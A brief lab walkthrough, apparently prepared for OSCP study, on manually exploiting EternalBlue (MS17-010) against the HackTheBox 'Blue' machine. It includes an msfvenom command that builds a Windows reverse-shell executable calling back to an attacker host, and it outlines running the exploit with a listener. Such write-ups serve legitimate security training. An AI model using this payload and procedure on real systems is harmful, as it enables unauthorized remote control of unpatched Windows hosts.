Background: As a part of my preparation for OSCP, I came across a way to manually exploit eternal blue (without metasploit). So compiling the same here so it could be useful to others too. For the purpose of demonstration I am using blue machine from Hack the Box (HTB). Exploit Use searchsploit to find the eternal blue exploit or you can even download it from exploitdb Now there are some modifications required and files required. We need to first make our backdoor exe to get a shell back. msfvenom -p windows/shell_reverse_tcp LHOST=IP LPORT=4444 -f exe > blue.exe Now we need to make few changes in the script from Exploitdb or searchsploit as follows: If we go through the script it will tell us we also need a smb file as a dependency for running this script. So you can download that file from here Now open a listener to get back a shell and run the script with the argument "netsvcs" Reference: https://github.com/worawit/MS17-010/blob/master/mysmb.py ht...